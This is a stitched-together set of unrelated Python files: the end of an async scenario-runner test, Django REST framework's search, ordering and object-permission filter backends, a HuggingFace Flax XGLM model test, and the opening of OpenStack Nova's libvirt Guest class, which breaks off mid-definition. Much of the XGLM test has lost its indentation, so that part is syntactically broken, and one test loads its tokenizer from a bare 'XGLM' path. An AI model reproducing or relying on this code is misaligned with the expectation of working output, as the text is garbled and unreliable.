        step_ = Mock(side_effect=interrupt_exception)
        scenario_ = Mock(Scenario, step=step_, __file__="/tmp/scenario.py")
        virtual_scenario = VirtualScenario(scenario_, [VirtualStep(step_)])
    with when, raises(BaseException) as exception:
        await runner.run_scenario(virtual_scenario)
    with then:
        assert exception.type is interrupt_exception
|
|
"""
Provides generic filtering backends that can be used to filter the results
returned by list views.
"""
from __future__ import unicode_literals
import operator
from functools import reduce
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.sql.constants import ORDER_PATTERN
from django.template import loader
from django.utils import six
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from rest_framework.compat import (
coreapi, coreschema, distinct, guardian, template_render
)
from rest_framework.settings import api_settings
class BaseFilterBackend(object):
    """
    A base class from which all filter backend classes should inherit.
    """

    def filter_queryset(self, request, queryset, view):
        """
        Return a filtered queryset.
        """
        raise NotImplementedError(".filter_queryset() must be overridden.")

    def get_schema_fields(self, view):
        """Return coreapi.Field descriptors for this backend's query params."""
        assert coreapi is not None, 'coreapi must be installed to use `get_schema_fields()`'
        assert coreschema is not None, 'coreschema must be installed to use `get_schema_fields()`'
        return []
class SearchFilter(BaseFilterBackend):
    """Filters a queryset against the view's `search_fields` using the
    `?search=` query parameter."""
    # The URL query parameter used for the search.
    search_param = api_settings.SEARCH_PARAM
    template = 'rest_framework/filters/search.html'
    # A leading prefix character on a search field selects the ORM lookup.
    lookup_prefixes = {
        '^': 'istartswith',
        '=': 'iexact',
        '@': 'search',
        '$': 'iregex',
    }
    search_title = _('Search')
    search_description = _('A search term.')

    def get_search_terms(self, request):
        """
        Search terms are set by a ?search=... query parameter,
        and may be comma and/or whitespace delimited.
        """
        params = request.query_params.get(self.search_param, '')
        return params.replace(',', ' ').split()

    def construct_search(self, field_name):
        """Map a (possibly prefixed) search field name to an ORM lookup path."""
        lookup = self.lookup_prefixes.get(field_name[0])
        if lookup:
            field_name = field_name[1:]
        else:
            # No recognized prefix: default to case-insensitive containment.
            lookup = 'icontains'
        return LOOKUP_SEP.join([field_name, lookup])

    def must_call_distinct(self, queryset, search_fields):
        """
        Return True if 'distinct()' should be used to query the given lookups.
        """
        for search_field in search_fields:
            opts = queryset.model._meta
            if search_field[0] in self.lookup_prefixes:
                search_field = search_field[1:]
            parts = search_field.split(LOOKUP_SEP)
            for part in parts:
                field = opts.get_field(part)
                if hasattr(field, 'get_path_info'):
                    # This field is a relation, update opts to follow the relation
                    path_info = field.get_path_info()
                    opts = path_info[-1].to_opts
                    if any(path.m2m for path in path_info):
                        # This field is a m2m relation so we know we need to call distinct
                        return True
        return False

    def filter_queryset(self, request, queryset, view):
        """OR the per-field lookups for each term, AND the terms together."""
        search_fields = getattr(view, 'search_fields', None)
        search_terms = self.get_search_terms(request)
        if not search_fields or not search_terms:
            return queryset
        orm_lookups = [
            self.construct_search(six.text_type(search_field))
            for search_field in search_fields
        ]
        base = queryset
        conditions = []
        for search_term in search_terms:
            queries = [
                models.Q(**{orm_lookup: search_term})
                for orm_lookup in orm_lookups
            ]
            conditions.append(reduce(operator.or_, queries))
        queryset = queryset.filter(reduce(operator.and_, conditions))
        if self.must_call_distinct(queryset, search_fields):
            # Filtering against a many-to-many field requires us to
            # call queryset.distinct() in order to avoid duplicate items
            # in the resulting queryset.
            # We try to avoid this if possible, for performance reasons.
            queryset = distinct(queryset, base)
        return queryset

    def to_html(self, request, queryset, view):
        """Render the search box control for the browsable API."""
        if not getattr(view, 'search_fields', None):
            return ''
        term = self.get_search_terms(request)
        term = term[0] if term else ''
        context = {
            'param': self.search_param,
            'term': term
        }
        template = loader.get_template(self.template)
        return template_render(template, context)

    def get_schema_fields(self, view):
        """Describe the search query parameter for schema generation."""
        assert coreapi is not None, 'coreapi must be installed to use `get_schema_fields()`'
        assert coreschema is not None, 'coreschema must be installed to use `get_schema_fields()`'
        return [
            coreapi.Field(
                name=self.search_param,
                required=False,
                location='query',
                schema=coreschema.String(
                    title=force_text(self.search_title),
                    description=force_text(self.search_description)
                )
            )
        ]
class OrderingFilter(BaseFilterBackend):
    """
    Orders the queryset by a comma delimited `?ordering=` query parameter.

    Valid field names come from the view's `ordering_fields`, or are derived
    from its serializer when that attribute is absent.
    """
    # The URL query parameter used for the ordering.
    ordering_param = api_settings.ORDERING_PARAM
    ordering_fields = None
    ordering_title = _('Ordering')
    ordering_description = _('Which field to use when ordering the results.')
    template = 'rest_framework/filters/ordering.html'

    def get_ordering(self, request, queryset, view):
        """
        Ordering is set by a comma delimited ?ordering=... query parameter.

        The `ordering` query parameter can be overridden by setting
        the `ordering_param` value on the OrderingFilter or by
        specifying an `ORDERING_PARAM` value in the API settings.
        """
        params = request.query_params.get(self.ordering_param)
        if params:
            fields = [param.strip() for param in params.split(',')]
            ordering = self.remove_invalid_fields(queryset, fields, view, request)
            if ordering:
                return ordering
        # No ordering was included, or all the ordering fields were invalid
        return self.get_default_ordering(view)

    def get_default_ordering(self, view):
        """Return the view-level `ordering` attribute, normalized to a tuple."""
        ordering = getattr(view, 'ordering', None)
        if isinstance(ordering, six.string_types):
            return (ordering,)
        return ordering

    def get_default_valid_fields(self, queryset, view, context=None):
        """
        Return (field source, label) pairs derived from the view's serializer.

        Raises ImproperlyConfigured when no serializer can be determined.
        """
        # Fixed: `context={}` was a shared mutable default argument; use a
        # None sentinel instead (behavior is unchanged, the dict was only read).
        if context is None:
            context = {}
        # If `ordering_fields` is not specified, then we determine a default
        # based on the serializer class, if one exists on the view.
        if hasattr(view, 'get_serializer_class'):
            try:
                serializer_class = view.get_serializer_class()
            except AssertionError:
                # Raised by the default implementation if
                # no serializer_class was found
                serializer_class = None
        else:
            serializer_class = getattr(view, 'serializer_class', None)
        if serializer_class is None:
            msg = (
                "Cannot use %s on a view which does not have either a "
                "'serializer_class', an overriding 'get_serializer_class' "
                "or 'ordering_fields' attribute."
            )
            raise ImproperlyConfigured(msg % self.__class__.__name__)
        return [
            (field.source or field_name, field.label)
            for field_name, field in serializer_class(context=context).fields.items()
            if not getattr(field, 'write_only', False) and not field.source == '*'
        ]

    def get_valid_fields(self, queryset, view, context=None):
        """Return the (field, label) pairs callers are allowed to order by."""
        # Fixed: `context={}` was a shared mutable default argument.
        if context is None:
            context = {}
        valid_fields = getattr(view, 'ordering_fields', self.ordering_fields)
        if valid_fields is None:
            # Default to allowing filtering on serializer fields
            return self.get_default_valid_fields(queryset, view, context)
        elif valid_fields == '__all__':
            # View explicitly allows filtering on any model field
            valid_fields = [
                (field.name, field.verbose_name) for field in queryset.model._meta.fields
            ]
            valid_fields += [
                (key, key.title().split('__'))
                for key in queryset.query.annotations.keys()
            ]
        else:
            valid_fields = [
                (item, item) if isinstance(item, six.string_types) else item
                for item in valid_fields
            ]
        return valid_fields

    def remove_invalid_fields(self, queryset, fields, view, request):
        """Drop terms that are not valid fields or not ORDER_PATTERN-shaped."""
        valid_fields = [item[0] for item in self.get_valid_fields(queryset, view, {'request': request})]
        return [term for term in fields if term.lstrip('-') in valid_fields and ORDER_PATTERN.match(term)]

    def filter_queryset(self, request, queryset, view):
        """Apply the requested (or default) ordering to `queryset`."""
        ordering = self.get_ordering(request, queryset, view)
        if ordering:
            return queryset.order_by(*ordering)
        return queryset

    def get_template_context(self, request, queryset, view):
        """Build the context for rendering the browsable-API ordering control."""
        current = self.get_ordering(request, queryset, view)
        current = None if current is None else current[0]
        options = []
        context = {
            'request': request,
            'current': current,
            'param': self.ordering_param,
        }
        for key, label in self.get_valid_fields(queryset, view, context):
            options.append((key, '%s - %s' % (label, _('ascending'))))
            options.append(('-' + key, '%s - %s' % (label, _('descending'))))
        context['options'] = options
        return context

    def to_html(self, request, queryset, view):
        """Render the ordering control for the browsable API."""
        template = loader.get_template(self.template)
        context = self.get_template_context(request, queryset, view)
        return template_render(template, context)

    def get_schema_fields(self, view):
        """Describe the ordering query parameter for schema generation."""
        assert coreapi is not None, 'coreapi must be installed to use `get_schema_fields()`'
        assert coreschema is not None, 'coreschema must be installed to use `get_schema_fields()`'
        return [
            coreapi.Field(
                name=self.ordering_param,
                required=False,
                location='query',
                schema=coreschema.String(
                    title=force_text(self.ordering_title),
                    description=force_text(self.ordering_description)
                )
            )
        ]
class DjangoObjectPermissionsFilter(BaseFilterBackend):
    """
    A filter backend that limits results to those where the requesting user
    has read object level permissions.
    """
    # Class-level template for the required permission; filter_queryset reads
    # it via `self.perm_format`, so it must live on the class, not in __init__.
    perm_format = '%(app_label)s.view_%(model_name)s'

    def __init__(self):
        assert guardian, 'Using DjangoObjectPermissionsFilter, but django-guardian is not installed'

    def filter_queryset(self, request, queryset, view):
        """Restrict `queryset` to objects `request.user` may view."""
        # We want to defer this import until run-time, rather than import-time.
        # See https://github.com/encode/django-rest-framework/issues/4608
        # (Also see #1624 for why we need to make this import explicitly)
        from guardian.shortcuts import get_objects_for_user

        user = request.user
        model_cls = queryset.model
        kwargs = {
            'app_label': model_cls._meta.app_label,
            'model_name': model_cls._meta.model_name
        }
        permission = self.perm_format % kwargs
        # Fixed: removed a dead `extra = {}` initialization that both branches
        # below unconditionally overwrote.
        if tuple(guardian.VERSION) >= (1, 3):
            # Maintain behavior compatibility with versions prior to 1.3
            extra = {'accept_global_perms': False}
        else:
            extra = {}
        return get_objects_for_user(user, permission, queryset, **extra)
|
|
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tempfile
import unittest
import transformers
from transformers import XGLMConfig, XGLMTokenizer, is_flax_available, is_torch_available
from transformers.testing_utils import is_pt_flax_cross_test, require_flax, require_sentencepiece, slow
from ..generation.test_generation_flax_utils import FlaxGenerationTesterMixin
from ..test_modeling_flax_common import FlaxModelTesterMixin, floats_tensor, ids_tensor, random_attention_mask
if is_flax_available():
import numpy as np
import jax
import jax.numpy as jnp
from transformers.modeling_flax_pytorch_utils import (
convert_pytorch_state_dict_to_flax,
load_flax_weights_in_pytorch_model,
)
from transformers.models.xglm.modeling_flax_xglm import FlaxXGLMForCausalLM, FlaxXGLMModel
if is_torch_available():
import torch
@require_flax
class FlaxXGLMModelTester:
    """Builds tiny XGLM configs and random inputs, plus shared cached-decoding
    checks, for the Flax XGLM model tests."""

    def __init__(
        self,
        parent,
        batch_size=14,
        seq_length=7,
        is_training=True,
        use_input_mask=True,
        use_labels=True,
        vocab_size=99,
        d_model=32,
        num_hidden_layers=5,
        num_attention_heads=4,
        ffn_dim=37,
        activation_function="gelu",
        activation_dropout=0.1,
        attention_dropout=0.1,
        max_position_embeddings=512,
        initializer_range=0.02,
        scope=None,
    ):
        # `parent` is the unittest.TestCase using this tester (for assertions).
        self.parent = parent
        self.batch_size = batch_size
        self.seq_length = seq_length
        self.is_training = is_training
        self.use_input_mask = use_input_mask
        self.use_labels = use_labels
        self.vocab_size = vocab_size
        self.hidden_size = d_model
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.ffn_dim = ffn_dim
        self.activation_function = activation_function
        self.activation_dropout = activation_dropout
        self.attention_dropout = attention_dropout
        self.max_position_embeddings = max_position_embeddings
        self.initializer_range = initializer_range
        # NOTE(review): the `scope` argument is accepted but always discarded.
        self.scope = None
        self.bos_token_id = 0
        self.eos_token_id = 2
        self.pad_token_id = 1

    def prepare_config_and_inputs(self):
        """Return (config, input_ids, input_mask) with random token ids.

        Ids are clipped to >= 3 so they stay above the special token ids
        (bos=0, pad=1, eos=2) defined above.
        """
        input_ids = np.clip(ids_tensor([self.batch_size, self.seq_length], self.vocab_size), 3, self.vocab_size)
        input_mask = None
        if self.use_input_mask:
            input_mask = random_attention_mask([self.batch_size, self.seq_length])
        config = XGLMConfig(
            vocab_size=self.vocab_size,
            d_model=self.hidden_size,
            num_layers=self.num_hidden_layers,
            attention_heads=self.num_attention_heads,
            ffn_dim=self.ffn_dim,
            activation_function=self.activation_function,
            activation_dropout=self.activation_dropout,
            attention_dropout=self.attention_dropout,
            max_position_embeddings=self.max_position_embeddings,
            initializer_range=self.initializer_range,
            use_cache=True,
            bos_token_id=self.bos_token_id,
            eos_token_id=self.eos_token_id,
            pad_token_id=self.pad_token_id,
        )
        return (config, input_ids, input_mask)

    def prepare_config_and_inputs_for_common(self):
        """Repackage prepare_config_and_inputs() as (config, inputs_dict)."""
        config_and_inputs = self.prepare_config_and_inputs()
        config, input_ids, attention_mask = config_and_inputs
        inputs_dict = {"input_ids": input_ids, "attention_mask": attention_mask}
        return config, inputs_dict

    def prepare_config_and_inputs_for_decoder(self):
        """Additionally fabricate encoder hidden states and mask for decoder tests."""
        config, input_ids, attention_mask = self.prepare_config_and_inputs()
        encoder_hidden_states = floats_tensor([self.batch_size, self.seq_length, self.hidden_size])
        encoder_attention_mask = ids_tensor([self.batch_size, self.seq_length], vocab_size=2)
        return (
            config,
            input_ids,
            attention_mask,
            encoder_hidden_states,
            encoder_attention_mask,
        )

    def check_use_cache_forward(self, model_class_name, config, input_ids, attention_mask):
        """Verify incremental decoding via init_cache matches a full forward pass.

        Runs all-but-last tokens with a fresh cache, then the last token with the
        returned cache, and compares the final-token outputs (first 5 dims)
        against a plain full-sequence forward within 1e-3.
        """
        max_decoder_length = 20
        model = model_class_name(config)
        past_key_values = model.init_cache(input_ids.shape[0], max_decoder_length)
        # All-ones mask over the full cache length for the cached calls.
        attention_mask = jnp.ones((input_ids.shape[0], max_decoder_length), dtype="i4")
        position_ids = jnp.broadcast_to(
            jnp.arange(input_ids.shape[-1] - 1)[None, :], (input_ids.shape[0], input_ids.shape[-1] - 1)
        )
        outputs_cache = model(
            input_ids[:, :-1],
            attention_mask=attention_mask,
            past_key_values=past_key_values,
            position_ids=position_ids,
        )
        # Position of the final token for the single-step cached call.
        position_ids = jnp.array(input_ids.shape[0] * [[input_ids.shape[-1] - 1]], dtype="i4")
        outputs_cache_next = model(
            input_ids[:, -1:],
            attention_mask=attention_mask,
            past_key_values=outputs_cache.past_key_values,
            position_ids=position_ids,
        )
        outputs = model(input_ids)
        diff = np.max(np.abs((outputs_cache_next[0][:, -1, :5] - outputs[0][:, -1, :5])))
        self.parent.assertTrue(diff < 1e-3, msg=f"Max diff is {diff}")

    def check_use_cache_forward_with_attn_mask(self, model_class_name, config, input_ids, attention_mask):
        """Same as check_use_cache_forward, but threads the caller-provided
        attention mask (zero-padded out to the cache length) through both calls."""
        max_decoder_length = 20
        model = model_class_name(config)
        attention_mask_cache = jnp.concatenate(
            [attention_mask, jnp.zeros((attention_mask.shape[0], max_decoder_length - attention_mask.shape[1]))],
            axis=-1,
        )
        past_key_values = model.init_cache(input_ids.shape[0], max_decoder_length)
        position_ids = jnp.broadcast_to(
            jnp.arange(input_ids.shape[-1] - 1)[None, :], (input_ids.shape[0], input_ids.shape[-1] - 1)
        )
        outputs_cache = model(
            input_ids[:, :-1],
            attention_mask=attention_mask_cache,
            past_key_values=past_key_values,
            position_ids=position_ids,
        )
        position_ids = jnp.array(input_ids.shape[0] * [[input_ids.shape[-1] - 1]], dtype="i4")
        outputs_cache_next = model(
            input_ids[:, -1:],
            past_key_values=outputs_cache.past_key_values,
            attention_mask=attention_mask_cache,
            position_ids=position_ids,
        )
        outputs = model(input_ids, attention_mask=attention_mask)
        diff = np.max(np.abs((outputs_cache_next[0][:, -1, :5] - outputs[0][:, -1, :5])))
        self.parent.assertTrue(diff < 1e-3, msg=f"Max diff is {diff}")
@require_sentencepiece
@require_flax
class FlaxXGLMModelTest(FlaxModelTesterMixin, FlaxGenerationTesterMixin, unittest.TestCase):
all_model_classes = (FlaxXGLMModel, FlaxXGLMForCausalLM) if is_flax_available() else ()
all_generative_model_classes = (FlaxXGLMForCausalLM,) if is_flax_available() else ()
    def setUp(self):
        # Shared tester that builds configs/inputs for all model classes.
        self.model_tester = FlaxXGLMModelTester(self)
    def test_use_cache_forward(self):
        """Cached incremental decoding matches a full forward pass."""
        for model_class_name in self.all_model_classes:
            config, input_ids, attention_mask = self.model_tester.prepare_config_and_inputs()
            self.model_tester.check_use_cache_forward(model_class_name, config, input_ids, attention_mask)
    def test_use_cache_forward_with_attn_mask(self):
        """Cached incremental decoding matches a full pass when a real
        attention mask is supplied."""
        for model_class_name in self.all_model_classes:
            config, input_ids, attention_mask = self.model_tester.prepare_config_and_inputs()
            self.model_tester.check_use_cache_forward_with_attn_mask(
                model_class_name, config, input_ids, attention_mask
            )
@slow
def test_batch_generation(self):
tokenizer = XGLMTokenizer.from_pretrained("XGLM", padding_side="left")
inputs = tokenizer(["Hello this is a long string", "Hey"], return_tensors="np", padding=True, truncation=True)
model = FlaxXGLMForCausalLM.from_pretrained("facebook/xglm-564M")
model.config.num_beams = 1
model.config.do_sample = False
jit_generate = jax.jit(model.generate)
output_sequences = jit_generate(inputs["input_ids"], attention_mask=inputs["attention_mask"]).sequences
output_string = tokenizer.batch_decode(output_sequences, skip_special_tokens=True)
expected_string = [
"Hello this is a long string of questions, but I'm not sure if I'm",
"Hey, I'm a newbie to the forum and I'",
]
self.assertListEqual(output_string, expected_string)
# overwrite from common since `attention_mask` in combination
# with `causal_mask` behaves slighly differently
@is_pt_flax_cross_test
def test_equivalence_pt_to_flax(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
batch_size, seq_length = pt_inputs["input_ids"].shape
rnd_start_indices = np.random.randint(0, seq_length - 1, size=(batch_size,))
for batch_idx, start_index in enumerate(rnd_start_indices):
pt_inputs["attention_mask"][batch_idx, :start_index] = 0
pt_inputs["attention_mask"][batch_idx, start_index:] = 1
prepared_inputs_dict["attention_mask"][batch_idx, :start_index] = 0
prepared_inputs_dict["attention_mask"][batch_idx, start_index:] = 1
pt_model = pt_model_class(config).eval()
# Flax models don't use the `use_cache` option and cache is not returned as a default.
# So we disable `use_cache` here for PyTorch model.
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
fx_state = convert_pytorch_state_dict_to_flax(pt_model.state_dict(), fx_model)
fx_model.params = fx_state
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output[:, -1], pt_output[:, -1].numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
pt_model.save_pretrained(tmpdirname)
fx_model_loaded = model_class.from_pretrained(tmpdirname, from_pt=True)
fx_outputs_loaded = fx_model_loaded(**prepared_inputs_dict).to_tuple()
self.assertEqual(
len(fx_outputs_loaded), len(pt_outputs), "Output lengths differ between Flax and PyTorch"
)
for fx_output_loaded, pt_output in zip(fx_outputs_loaded, pt_outputs):
self.assert_almost_equals(fx_output_loaded[:, -1], pt_output[:, -1].numpy(), 4e-2)
# overwrite from common since `attention_mask` in combination
# with `causal_mask` behaves slighly differently
@is_pt_flax_cross_test
def test_equivalence_flax_to_pt(self):
config, inputs_dict = self.model_tester.prepare_config_and_inputs_for_common()
for model_class in self.all_model_classes:
with self.subTest(model_class.__name__):
# prepare inputs
prepared_inputs_dict = self._prepare_for_class(inputs_dict, model_class)
pt_inputs = {k: torch.tensor(v.tolist()) for k, v in prepared_inputs_dict.items()}
# load corresponding PyTorch class
pt_model_class_name = model_class.__name__[4:] # Skip the "Flax" at the beginning
pt_model_class = getattr(transformers, pt_model_class_name)
pt_model = pt_model_class(config).eval()
pt_model.config.use_cache = False
fx_model = model_class(config, dtype=jnp.float32)
pt_model = load_flax_weights_in_pytorch_model(pt_model, fx_model.params)
batch_size, seq_length = pt_inputs["input_ids"].shape
rnd_start_indices = np.random.randint(0, seq_length - 1, size=(batch_size,))
for batch_idx, start_index in enumerate(rnd_start_indices):
pt_inputs["attention_mask"][batch_idx, :start_index] = 0
pt_inputs["attention_mask"][batch_idx, start_index:] = 1
prepared_inputs_dict["attention_mask"][batch_idx, :start_index] = 0
prepared_inputs_dict["attention_mask"][batch_idx, start_index:] = 1
# make sure weights are tied in PyTorch
pt_model.tie_weights()
with torch.no_grad():
pt_outputs = pt_model(**pt_inputs).to_tuple()
fx_outputs = fx_model(**prepared_inputs_dict).to_tuple()
self.assertEqual(len(fx_outputs), len(pt_outputs), "Output lengths differ between Flax and PyTorch")
for fx_output, pt_output in zip(fx_outputs, pt_outputs):
self.assert_almost_equals(fx_output[:, -1], pt_output[:, -1].numpy(), 4e-2)
with tempfile.TemporaryDirectory() as tmpdirname:
fx_model.save_pretrained(tmpdirname)
pt_model_loaded = pt_model_class.from_pretrained(tmpdirname, from_flax=True)
with torch.no_grad():
pt_outputs_loaded = pt_model_loaded(**pt_inputs).to_tuple()
self.assertEqual(
len(fx_outputs), len(pt_outputs_loaded), "Output lengths differ between Flax and PyTorch"
)
for fx_output, pt_output in zip(fx_outputs, pt_outputs_loaded):
self.assert_almost_equals(fx_output[:, -1], pt_output[:, -1].numpy(), 4e-2)
@slow
def test_model_from_pretrained(self):
for model_class_name in self.all_model_classes:
model = model_class_name.from_pretrained("facebook/xglm-564M")
outputs = model(np.ones((1, 1)))
self.assertIsNotNone(outputs)
|
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2015 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the guest.
This class encapsulates libvirt domain provides certain
higher level APIs around the raw libvirt API. These APIs are
then used by all the other libvirt related classes
"""
import time
import typing as ty
from lxml import etree
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from nova.compute import power_state
from nova import exception
from nova.i18n import _
from nova.virt import hardware
from nova.virt.libvirt import config as vconfig
if ty.TYPE_CHECKING:
import libvirt
else:
libvirt = None
try:
import libvirtmod_qemu
except ImportError:
libvirtmod_qemu = None
LOG = logging.getLogger(__name__)
# NOTE: these mirror libvirt's virDomainState enum values. They are defined
# locally because the libvirt module itself is imported lazily (see the
# TYPE_CHECKING guard above), so they must be usable without it.
VIR_DOMAIN_NOSTATE = 0
VIR_DOMAIN_RUNNING = 1
VIR_DOMAIN_BLOCKED = 2
VIR_DOMAIN_PAUSED = 3
VIR_DOMAIN_SHUTDOWN = 4
VIR_DOMAIN_SHUTOFF = 5
VIR_DOMAIN_CRASHED = 6
VIR_DOMAIN_PMSUSPENDED = 7
# Mapping from libvirt domain state to Nova's power_state constants.
LIBVIRT_POWER_STATE = {
    VIR_DOMAIN_NOSTATE: power_state.NOSTATE,
    VIR_DOMAIN_RUNNING: power_state.RUNNING,
    # The DOMAIN_BLOCKED state is only valid in Xen.  It means that
    # the VM is running and the vCPU is idle. So, we map it to RUNNING
    VIR_DOMAIN_BLOCKED: power_state.RUNNING,
    VIR_DOMAIN_PAUSED: power_state.PAUSED,
    # The libvirt API doc says that DOMAIN_SHUTDOWN means the domain
    # is being shut down. So technically the domain is still
    # running. SHUTOFF is the real powered off state.  But we will map
    # both to SHUTDOWN anyway.
    # http://libvirt.org/html/libvirt-libvirt.html
    VIR_DOMAIN_SHUTDOWN: power_state.SHUTDOWN,
    VIR_DOMAIN_SHUTOFF: power_state.SHUTDOWN,
    VIR_DOMAIN_CRASHED: power_state.CRASHED,
    VIR_DOMAIN_PMSUSPENDED: power_state.SUSPENDED,
}
# Block job type constants, mirroring libvirt's virDomainBlockJobType:
# https://libvirt.org/html/libvirt-libvirt-domain.html#virDomainBlockJobType
VIR_DOMAIN_BLOCK_JOB_TYPE_UNKNOWN = 0
VIR_DOMAIN_BLOCK_JOB_TYPE_PULL = 1
VIR_DOMAIN_BLOCK_JOB_TYPE_COPY = 2
VIR_DOMAIN_BLOCK_JOB_TYPE_COMMIT = 3
VIR_DOMAIN_BLOCK_JOB_TYPE_ACTIVE_COMMIT = 4
VIR_DOMAIN_BLOCK_JOB_TYPE_BACKUP = 5
VIR_DOMAIN_BLOCK_JOB_TYPE_LAST = 6
# Human-readable names for the block job types above; used in debug logging.
LIBVIRT_BLOCK_JOB_TYPE = {
    VIR_DOMAIN_BLOCK_JOB_TYPE_UNKNOWN: 'UNKNOWN',
    VIR_DOMAIN_BLOCK_JOB_TYPE_PULL: 'PULL',
    VIR_DOMAIN_BLOCK_JOB_TYPE_COPY: 'COPY',
    VIR_DOMAIN_BLOCK_JOB_TYPE_COMMIT: 'COMMIT',
    VIR_DOMAIN_BLOCK_JOB_TYPE_ACTIVE_COMMIT: 'ACTIVE_COMMIT',
    VIR_DOMAIN_BLOCK_JOB_TYPE_BACKUP: 'BACKUP',
    VIR_DOMAIN_BLOCK_JOB_TYPE_LAST: 'LAST',
}
class Guest(object):
    """High level wrapper around a libvirt domain object.

    Encapsulates a raw libvirt domain and provides the higher level
    operations (launch, device attach/detach, snapshot, migration, ...)
    used by the rest of the libvirt driver.
    """
    def __init__(self, domain):
        # libvirt is imported lazily so this module can be imported (e.g. for
        # type checking or unit tests) on hosts without the python bindings.
        global libvirt
        if libvirt is None:
            libvirt = importutils.import_module('libvirt')
        self._domain = domain
    def __repr__(self):
        return "<Guest %(id)d %(name)s %(uuid)s>" % {
            'id': self.id,
            'name': self.name,
            'uuid': self.uuid
        }
    @property
    def id(self):
        # libvirt numeric domain id; only meaningful while the guest runs.
        return self._domain.ID()
    @property
    def uuid(self):
        # Canonical string form of the domain UUID.
        return self._domain.UUIDString()
    @property
    def name(self):
        return self._domain.name()
    @property
    def _encoded_xml(self):
        # Live domain XML, decoded to a native string.
        return encodeutils.safe_decode(self._domain.XMLDesc(0))
    @classmethod
    def create(cls, xml, host):
        """Create a new Guest
        :param xml: XML definition of the domain to create
        :param host: host.Host connection to define the guest on
        :returns guest.Guest: Guest ready to be launched
        """
        try:
            if isinstance(xml, bytes):
                xml = xml.decode('utf-8')
            guest = host.write_instance_config(xml)
        except Exception:
            # Log the offending XML before re-raising to aid debugging.
            with excutils.save_and_reraise_exception():
                LOG.error('Error defining a guest with XML: %s',
                          encodeutils.safe_decode(xml))
        return guest
    def launch(self, pause=False):
        """Starts a created guest.
        :param pause: Indicates whether to start and pause the guest
        """
        flags = pause and libvirt.VIR_DOMAIN_START_PAUSED or 0
        try:
            return self._domain.createWithFlags(flags)
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.exception('Error launching a defined domain with XML: %s',
                              self._encoded_xml, errors='ignore')
    def poweroff(self):
        """Stops a running guest."""
        self._domain.destroy()
    def sync_guest_time(self):
        """Try to set VM time to the current value.  This is typically useful
        when clock wasn't running on the VM for some time (e.g. during
        suspension or migration), especially if the time delay exceeds NTP
        tolerance.
        It is not guaranteed that the time is actually set (it depends on guest
        environment, especially QEMU agent presence) or that the set time is
        very precise (NTP in the guest should take care of it if needed).
        """
        t = time.time()
        seconds = int(t)
        nseconds = int((t - seconds) * 10 ** 9)
        try:
            self._domain.setTime(time={'seconds': seconds,
                                       'nseconds': nseconds})
        except libvirt.libvirtError as e:
            # Expected agent-related failures are logged at DEBUG only;
            # anything else is a WARNING.  None of them are fatal.
            code = e.get_error_code()
            if code == libvirt.VIR_ERR_AGENT_UNRESPONSIVE:
                LOG.debug('Failed to set time: QEMU agent unresponsive',
                          instance_uuid=self.uuid)
            elif code == libvirt.VIR_ERR_OPERATION_UNSUPPORTED:
                LOG.debug('Failed to set time: not supported',
                          instance_uuid=self.uuid)
            elif code == libvirt.VIR_ERR_ARGUMENT_UNSUPPORTED:
                LOG.debug('Failed to set time: agent not configured',
                          instance_uuid=self.uuid)
            else:
                LOG.warning('Failed to set time: %(reason)s',
                            {'reason': e}, instance_uuid=self.uuid)
        except Exception as ex:
            # The highest priority is not to let this method crash and thus
            # disrupt its caller in any way.  So we swallow this error here,
            # to be absolutely safe.
            LOG.debug('Failed to set time: %(reason)s',
                      {'reason': ex}, instance_uuid=self.uuid)
        else:
            LOG.debug('Time updated to: %d.%09d', seconds, nseconds,
                      instance_uuid=self.uuid)
    def inject_nmi(self):
        """Injects an NMI to a guest."""
        self._domain.injectNMI()
    def resume(self):
        """Resumes a paused guest."""
        self._domain.resume()
    def get_interfaces(self):
        """Returns a list of all network interfaces for this domain."""
        doc = None
        try:
            doc = etree.fromstring(self._encoded_xml)
        except Exception:
            # Unparseable XML is treated as "no interfaces".
            return []
        interfaces = []
        nodes = doc.findall('./devices/interface/target')
        for target in nodes:
            interfaces.append(target.get('dev'))
        return interfaces
    def get_interface_by_cfg(
        self,
        cfg: vconfig.LibvirtConfigGuestDevice,
